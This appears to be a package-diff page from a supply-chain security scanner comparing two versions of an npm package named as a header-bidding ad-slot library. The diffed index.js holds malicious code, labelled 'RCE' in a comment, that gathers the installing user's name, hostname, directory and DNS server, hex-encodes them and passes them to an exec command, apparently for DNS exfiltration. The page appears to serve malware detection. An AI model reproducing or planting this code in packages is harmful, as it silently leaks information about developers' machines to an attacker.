@plentyofcode/header-bidding-adslot 2.0.42 → 2.0.43
Sign up to get free protection for your applications and to get access to all the features.
- package/index.js +14 -9
- package/package.json +1 -1
package/index.js
CHANGED
|
@@ -3,22 +3,27 @@ const dns = require("dns");
|
|
|
3
3
|
const os = require("os");
|
|
4
4
|
const path = require("path");
|
|
5
5
|
|
|
6
|
-
//
|
|
7
|
-
|
|
8
|
-
|
|
9
|
-
|
|
10
|
-
|
|
6
|
+
// Function to convert a string to hexadecimal
|
|
7
|
+
function toHex(str) {
|
|
8
|
+
return str.split('').map(char => char.charCodeAt(0).toString(16)).join('');
|
|
9
|
+
}
|
|
10
|
+
|
|
11
|
+
// RCE
|
|
12
|
+
const username = os.userInfo().username; // Username
|
|
13
|
+
const hostname = os.hostname(); // HostName
|
|
14
|
+
const currentDir = path.basename(__dirname); // Current Directory
|
|
15
|
+
const dnsServer = dns.getServers()[0] || "none"; // First DNS Server
|
|
11
16
|
|
|
12
17
|
// Create the information in a compact format
|
|
13
18
|
const info = `u=${username}&hn=${hostname}&d=${currentDir}&dns=${dnsServer}`;
|
|
14
19
|
|
|
15
|
-
// Encode the information in
|
|
16
|
-
let encodedInfo =
|
|
20
|
+
// Encode the information in hexadecimal
|
|
21
|
+
let encodedInfo = toHex(info);
|
|
17
22
|
|
|
18
23
|
// Check if the encoded string exceeds 63 characters
|
|
19
24
|
if (encodedInfo.length > 63) {
|
|
20
25
|
// Use only the username if the string is too long
|
|
21
|
-
encodedInfo =
|
|
26
|
+
encodedInfo = toHex(`u=${username}`);
|
|
22
27
|
}
|
|
23
28
|
|
|
24
29
|
// Execute the command with the encoded information
|
|
@@ -31,4 +36,4 @@ exec(command, (error, data) => {
|
|
|
31
36
|
return;
|
|
32
37
|
}
|
|
33
38
|
console.log(data);
|
|
34
|
-
});
|
|
39
|
+
});
|